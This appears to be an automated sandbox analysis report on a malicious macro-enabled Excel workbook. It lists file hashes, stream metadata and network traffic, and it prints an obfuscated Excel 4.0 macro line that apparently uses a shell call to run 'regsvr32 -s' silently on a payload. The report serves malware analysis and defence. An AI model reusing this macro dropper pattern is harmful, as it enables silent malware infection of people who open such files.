Entropy (8bit): | 7.75941359400182 |
TrID: |
|
File name: | sample20210111-01.xlsm |
File size: | 40268 |
MD5: | fa5350d4304c4c2ceafa435244b5a5fc |
SHA1: | fc8a20962b8cf86568b1e85be02ee9c7b62d94b2 |
SHA256: | 0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d |
SHA512: | 09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625 |
SSDEEP: | 768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ |
File Content Preview: | PK..........!.o.m.....*.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 2 |
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Module1.bas, Stream Size: 3215 |
---|
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 3215 |
Data ASCII: | . . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Integer: |
bycilke() |
VB_Name |
MiV(sem.value) |
homepodd() |
homepodd |
Error |
Integer) |
bycilke |
Function |
ol).Name |
"!"): |
String |
"ab": |
Split(govs, |
Randomize: |
yellowsto(yel |
Next: |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants) |
yellowsto(Oa)))) |
Integer |
yellowsto |
ol).value |
nimo(Int((UBound(nimo) |
Replace(Vo, |
Chr(sem.Row) |
Sheets(ol).Cells(homepodd, |
"ab")) |
Split(kij(ol), |
yellowsto(homepodd)) |
Rnd)) |
(Run("" |
"moreP_" |
Variant) |
Attribute |
Resume |
pagesREviewsd(Optional |
ecimovert(nimo |
ecimovert |
MsgBox |
VBA Code |
---|
|
VBA File Name: Sheet1.cls, Stream Size: 1614 |
---|
General | |
---|---|
Stream Path: | VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 1614 |
Data ASCII: | . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . |
Data Raw: | 01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Index |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Long) |
ResizePagess() |
VB_Customizable |
"REviewsd" |
VB_Control |
MultiPage" |
VB_TemplateDerived |
MSForms, |
False |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
ResizePagess |
"pages" |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 554 |
Entropy: | 5.25519546931 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1 |
Data Raw: | 49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 86 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 86 |
Entropy: | 3.24455457963 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3574 |
Entropy: | 4.46002460936 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2060 |
Entropy: | 3.45134089702 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 187 |
Entropy: | 1.91493173134 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 363 |
Entropy: | 2.21122978445 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 398 |
Entropy: | 2.07709195049 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 820 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 820 |
Entropy: | 6.5044215585 |
Base64 Encoded: | True |
Data ASCII: | . 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 115 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 115 |
Entropy: | 4.80096587863 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 178 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 178 |
Entropy: | 2.59766210867 |
Base64 Encoded: | False |
Data ASCII: | . . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . . |
Data Raw: | 00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i02/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i02/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.54176014818 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i02/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i03/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i03/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.90677964945 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i03/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: o, File Type: data, Stream Size: 152 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | data |
Stream Size: | 152 |
Entropy: | 2.68720470607 |
Base64 Encoded: | False |
Data ASCII: | . . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . . |
Data Raw: | 00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 |
Stream Path: x, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | x |
File Type: | data |
Stream Size: | 48 |
Entropy: | 1.42267983198 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:28:00.002847910 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.125716925 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.125803947 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.138995886 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.262025118 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263251066 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263308048 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.264287949 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.265647888 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.387058973 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388211012 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388309956 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.389369965 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512084007 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512468100 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512512922 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512586117 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512613058 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.526820898 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.527962923 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.649553061 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650635004 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650715113 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.651102066 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.773710012 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.773785114 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:27:59.992686987 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.852425098 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.900594950 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.939555883 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
